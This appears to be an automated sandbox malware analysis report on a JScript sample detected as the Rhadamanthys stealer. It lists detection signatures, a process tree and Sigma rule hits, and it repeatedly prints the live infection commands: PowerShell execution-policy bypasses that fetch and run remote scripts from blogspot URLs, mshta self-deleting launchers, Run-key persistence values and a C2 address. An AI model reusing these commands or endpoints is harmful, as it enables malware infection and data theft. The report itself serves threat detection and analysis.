Windows Analysis Report
0a0#U00a0.js

Overview

General Information

Sample name:0a0#U00a0.js
Analysis ID:1640931
MD5:4622368c48c8944b66952a57106f77c0
SHA1:83d4cfe14ce6e82bfb94521d15875340199cc336
SHA256:8fca8fbdaa5f0251a22fc7ccbd4bf650d3b1c806afe55cc69967e9df76f562f1

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected RHADAMANTHYS Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

  • System is w10x64native
  • wscript.exe (PID: 1756 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 4352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • RegSvcs.exe (PID: 7100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 1852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • svchost.exe (PID: 8420 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
          • svchost.exe (PID: 7624 cmdline: "C:\Windows\System32\svchost.exe" MD5: F586835082F632DC8D9404D83BC16316)
            • chrome.exe (PID: 8584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: DB46628EA19F23DEF3D3639E33431AD6)
            • chrome.exe (PID: 8156 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076" MD5: DB46628EA19F23DEF3D3639E33431AD6)
              • chrome.exe (PID: 1592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3 MD5: DB46628EA19F23DEF3D3639E33431AD6)
            • msedge.exe (PID: 8964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" MD5: F755556B2CE14570A86FB983EEA72F97)
            • msedge.exe (PID: 8540 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183" MD5: F755556B2CE14570A86FB983EEA72F97)
              • msedge.exe (PID: 8808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3 MD5: F755556B2CE14570A86FB983EEA72F97)
            • wmlaunch.exe (PID: 6344 cmdline: "C:\Program Files\Windows Media Player\wmlaunch.exe" MD5: C8BCC18E4197CD207596A0AD4CDAACAC)
              • dllhost.exe (PID: 8076 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • RegSvcs.exe (PID: 1756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 3008 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 2400 cmdline: dw20.exe -x -s 772 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • RegSvcs.exe (PID: 2888 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
        • dw20.exe (PID: 4536 cmdline: dw20.exe -x -s 892 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
      • MSBuild.exe (PID: 4112 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • WerFault.exe (PID: 8312 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 12 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 9148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 56 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • MSBuild.exe (PID: 664 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
        • dw20.exe (PID: 8236 cmdline: dw20.exe -x -s 792 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
    • SettingSyncHost.exe (PID: 8428 cmdline: "C:\Windows\System32\SettingSyncHost.exe" MD5: F4683A0D28814C70DAD2DE036530887D)
  • mshta.exe (PID: 8588 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mshta.exe (PID: 8432 cmdline: "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • mshta.exe (PID: 2528 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • elevation_service.exe (PID: 1280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe" MD5: F557D8ABB5984175B3409105002C16D9)
  • mshta.exe (PID: 7248 cmdline: "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • elevation_service.exe (PID: 8216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe" MD5: F557D8ABB5984175B3409105002C16D9)
  • mshta.exe (PID: 5548 cmdline: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • AvastBrowserUpdate.exe (PID: 7876 cmdline: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe MD5: 11F050CE28C68E39C16CC85D4DF51664)
  • cleanup
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution:
  • Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}
Source | Rule | Description | Author | Strings
00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
Source | Rule | Description | Author | Strings
19.3.svchost.exe.5200000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
19.3.svchost.exe.5420000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
19.3.svchost.exe.5200000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
19.3.svchost.exe.5200000.6.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
19.3.svchost.exe.5420000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

System Summary

Source: Process started
Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
Data: Command: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", CommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1300, ProcessCommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", ProcessId: 8588, ProcessName: mshta.exe

Source: Process started
Author: Michael Haag
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8588, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;, ProcessId: 8656, ProcessName: powershell.exe

Source: Process started
Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4352, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ProcessId: 1756, ProcessName: wscript.exe

Source: Process started
Author: frack113
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala77

Source: Network Connection
Author: bartblaze
Data: DestinationIp: 185.208.159.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.11.30, SourceIsIpv6: false, SourcePort: 49851

Source: Registry Key set
Author: frack113, Florian Roth (Nextron Systems)
Data: Details: mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4352, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala77

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1852, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8420, ProcessName: svchost.exe

Source: Process started
Author: Michael Haag
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4352, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ProcessId: 1756, ProcessName: wscript.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 4352, ProcessName: powershell.exe

Source: Process started
Author: vburov
